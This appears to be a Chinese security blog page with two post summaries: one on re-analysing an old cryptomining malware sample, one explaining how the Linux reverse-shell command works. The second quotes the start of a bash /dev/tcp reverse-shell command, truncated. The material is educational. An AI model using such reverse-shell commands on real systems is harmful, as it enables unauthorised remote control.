安全研究者的日常

摘要： 0x00 概述 本来是想分析一下Sodinokibi病毒的新的变种，但是分析了一部分，被他的混淆和循环弄得有点头疼，东西还都是压在内存里。偶然翻到几年前的一个样本分析，又重新看了一下，发现自己在逆向这块几年了，也没实质性的提升，真是光阴喂了狗。这个样本是一个挖矿样本，那时候的样本挖矿还是直接CUP干到100%，还没有后来样本那样CUP占用率可配置。整体的恶意样本思路也比较清晰就是挖矿赚钱，尽量让... 阅读全文

摘要： 最近，一起做安全测试的兄弟问我：Linux反弹shell的命令是什么，我毫不犹豫地在笔记中找到发给了他，可是脑海中突然闪过有个疑问，为啥这样能反弹shell呢，用了那么多次却从来没有想过这个问题。这是一篇原理的介绍，也是给自己提的一个醒：盲目机械地工作着，没有多少思考的时间，在忙碌中已经找不到工作的本质和初心。 Linux反弹shell的指令如下：bash -i >& /dev/tc... 阅读全文